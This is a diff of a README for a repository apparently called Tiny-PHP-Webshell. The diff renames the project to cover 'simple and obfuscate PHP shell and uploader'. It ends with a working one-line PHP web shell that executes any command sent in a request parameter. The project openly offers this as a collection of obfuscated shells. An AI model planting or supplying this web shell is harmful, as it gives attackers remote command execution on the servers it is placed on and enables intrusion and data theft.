bayufedra/Tiny-PHP-Webshell/README.md

-# simple-and-obfuscate-PHP-shell
+# simple-and-obfuscate-PHP-shell and uploader
-several list of simple and obfuscate PHP shell
+several list of simple and obfuscate PHP shell and uploader

 ```
 <?= `{$_REQUEST['_']}` ?>